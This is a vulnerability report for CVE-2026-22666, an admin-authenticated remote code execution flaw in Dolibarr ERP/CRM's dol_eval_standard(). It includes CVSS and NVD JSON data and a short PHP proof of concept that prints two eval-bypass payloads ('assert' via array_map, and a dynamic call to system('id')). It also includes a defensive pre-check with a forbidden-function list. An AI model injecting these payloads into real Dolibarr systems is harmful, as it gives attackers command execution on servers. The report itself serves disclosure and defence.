Security Vulnerability Report
CVE-2026-22666 CVSS 7.2 HIGH

CVE-2026-22666

Published: 2026-04-07 13:16:45
Last Modified: 2026-04-24 14:20:47

Description

Dolibarr ERP/CRM versions prior to 23.0.2 contain an authenticated remote code execution vulnerability in the dol_eval_standard() function that fails to apply forbidden string checks in whitelist mode and does not detect PHP dynamic callable syntax. Attackers with administrator privileges can inject malicious payloads through computed extrafields or other evaluation paths using PHP dynamic callable syntax to bypass validation and achieve arbitrary command execution via eval().

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dolibarr:dolibarr_erp\/crm:*:*:*:*:*:*:*:* - VULNERABLE
Dolibarr ERP/CRM < 23.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
PHP
<?php
/*
 * PoC for CVE-2026-22666
 * Demonstrates bypassing dol_eval_standard using PHP dynamic callable syntax.
 * Requires administrator privileges to inject payload into computed extrafields.
 */

// The vulnerable function dol_eval_standard() fails to block dynamic callables.
// Attackers can inject payloads into extrafields that are eventually evaluated.

// Example Payload 1: Using array_map to obfuscate the call
// This bypasses simple string checks for 'eval' or 'system' by using a callback.
$payload = "array_map('assert', array('phpinfo();'))";

// Example Payload 2: Dynamic function call via variable
// This bypasses whitelist checks that look for direct function names.
$func = 'system';
$cmd = 'id';
$payload_dynamic = "$func('$cmd')";

// In the exploit scenario, these payloads would be sent via POST request
// to the endpoint handling extrafields configuration (e.g., /admin/extrafields.php).
// When the extrafield is rendered or processed, dol_eval_standard runs eval($payload).

echo "Potential Malicious Payload for Extrafield:\n";
echo $payload . "\n";
echo "\nOr Dynamic Syntax:\n";
echo $payload_dynamic . "\n";
?>
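The description says the vulnerable dol_eval_standard() skipped its forbidden-string check in whitelist mode and had no notion of PHP's dynamic callable syntax, so a name-based whitelist alone could be passed by calling through a variable or a string literal. The following is an added example of the kind of pre-check a guarded eval() wrapper can apply to a computed-field expression before evaluating it; it is not Dolibarr's code. The function name eval_expression_findings, the EVAL_WHITELIST and EVAL_FORBIDDEN lists, and the sample expressions are illustrative assumptions, and it assumes PHP 8.0 or later (str_contains, T_NAME_FULLY_QUALIFIED).

```php
<?php
// Added example, not Dolibarr code: a token-based pre-check that a guarded eval()
// wrapper could run on a computed-field expression before evaluating it. The
// function names, whitelist and forbidden list are illustrative assumptions, not
// the project's real lists. Requires PHP 8.0+.
declare(strict_types=1);

// Hypothetical whitelist: the only functions an expression may call by name.
const EVAL_WHITELIST = ['abs', 'round', 'max', 'min', 'strlen', 'number_format', 'intval', 'floatval'];

// Hypothetical forbidden substrings. The advisory says the vulnerable whitelist
// mode skipped this check; here it runs in every mode.
const EVAL_FORBIDDEN = ['eval', 'system', 'exec', 'passthru', 'popen', 'proc_open',
    'assert', 'include', 'require', 'array_map', 'call_user_func', 'base64_decode'];

/**
 * Return the reasons an expression must not reach eval(); an empty array means clean.
 */
function eval_expression_findings(string $expr): array
{
    $findings = [];

    // Check 1: forbidden substrings, case-insensitive, regardless of mode.
    $lower = strtolower($expr);
    foreach (EVAL_FORBIDDEN as $word) {
        if (str_contains($lower, $word)) {
            $findings[] = "forbidden string '$word'";
        }
    }

    // Check 2: walk the PHP tokens. Dropping whitespace and comments first makes
    // "which token follows this one" a plain index lookup.
    $tokens = array_values(array_filter(
        token_get_all('<?php ' . $expr . ';'),
        fn($t) => !is_array($t) || !in_array($t[0], [T_OPEN_TAG, T_WHITESPACE, T_COMMENT, T_DOC_COMMENT], true)
    ));

    // Keywords that have no place in a computed-field expression.
    $forbiddenTokens = [T_EVAL, T_INCLUDE, T_INCLUDE_ONCE, T_REQUIRE, T_REQUIRE_ONCE,
        T_NEW, T_FUNCTION, T_FN, T_DOUBLE_COLON];

    $count = count($tokens);
    for ($i = 0; $i < $count; $i++) {
        $t = $tokens[$i];
        $callFollows = (($tokens[$i + 1] ?? null) === '(');

        if (!is_array($t)) {
            // Single-character tokens.
            if ($t === '`') {
                $findings[] = 'backtick shell-execution operator';
            } elseif ($t === '$') {
                $findings[] = 'variable-variable syntax';
            } elseif (($t === ')' || $t === ']') && $callFollows) {
                // (expr)(...) or $arr['x'](...): calling a callable computed at runtime.
                $findings[] = 'call on a computed callable';
            }
            continue;
        }

        [$id, $text] = $t;
        if (in_array($id, $forbiddenTokens, true)) {
            $findings[] = "forbidden keyword '$text'";
        } elseif ($id === T_STRING && $callFollows
            && !in_array(strtolower($text), EVAL_WHITELIST, true)) {
            // Direct call by name that is not on the whitelist (array_map, system, ...).
            $findings[] = "non-whitelisted function '$text'";
        } elseif ($id === T_NAME_FULLY_QUALIFIED || $id === T_NAME_QUALIFIED) {
            // \system(...) or Foo\bar(...): namespaced names are never whitelisted here.
            $findings[] = "namespaced call '$text'";
        } elseif ($id === T_VARIABLE && $callFollows) {
            // $func(...): the dynamic callable form named in the advisory.
            $findings[] = "dynamic call through variable $text";
        } elseif ($id === T_CONSTANT_ENCAPSED_STRING && $callFollows) {
            // 'system'(...): a string literal used directly as a callable.
            $findings[] = "dynamic call through string literal $text";
        }
    }

    return array_values(array_unique($findings));
}

// Constructed sample expressions: one benign computed field, the page's payload 1,
// the page's payload 2 as PHP interpolates it (system('id')), and the variable
// form, which contains no forbidden substring at all and is caught only by the token walk.
$samples = [
    'round($obj->total_ht * 1.2, 2)',
    "array_map('assert', array('phpinfo();'))",
    "system('id')",
    "\$func('id')",
];
foreach ($samples as $expr) {
    $findings = eval_expression_findings($expr);
    printf("%-45s %s\n", $expr, $findings ? 'REJECT: ' . implode('; ', $findings) : 'ok');
}
```

The point of keeping both checks is that neither is sufficient alone: the substring list never sees a callable assembled at runtime, and a token-level whitelist only works if it is enforced on every call site, including calls through variables, string literals and parenthesised expressions. Running the tokenizer over the expression rather than the raw string is what lets the wrapper see those forms at all.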

References

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-22666",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-07T13:16:45.200",
    "lastModified": "2026-04-24T14:20:46.840",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Dolibarr ERP/CRM versions prior to 23.0.2 contain an authenticated remote code execution vulnerability in the dol_eval_standard() function that fails to apply forbidden string checks in whitelist mode and does not detect PHP dynamic callable syntax. Attackers with administrator privileges can inject malicious payloads through computed extrafields or other evaluation paths using PHP dynamic callable syntax to bypass validation and achieve arbitrary command execution via eval()."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 8.6,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH",
            "vulnAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-95"}]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-94"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:dolibarr:dolibarr_erp\\/crm:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "23.0.2",
                "matchCriteriaId": "21E20539-B901-4322-90BB-3FACD3AA1AE9"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Dolibarr/dolibarr/commit/6f425521b3e6f9f27eca05228e02093dbaa40dea",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/Dolibarr/dolibarr/releases/tag/23.0.2",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-vmvw-qq8w-wqhg",
        "source": "[email protected]",
        "tags": ["Broken Link"]
      },
      {
        "url": "https://jivasecurity.com/writeups/dolibarr-remote-code-execution-cve-2026-22666",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://www.vulncheck.com/advisories/dolibarr-erp-crm-authenticated-rce-via-dol-eval-standard",
        "source": "[email protected]",
        "tags": ["Third Party Advisory", "VDB Entry"]
      }
    ]
  }
}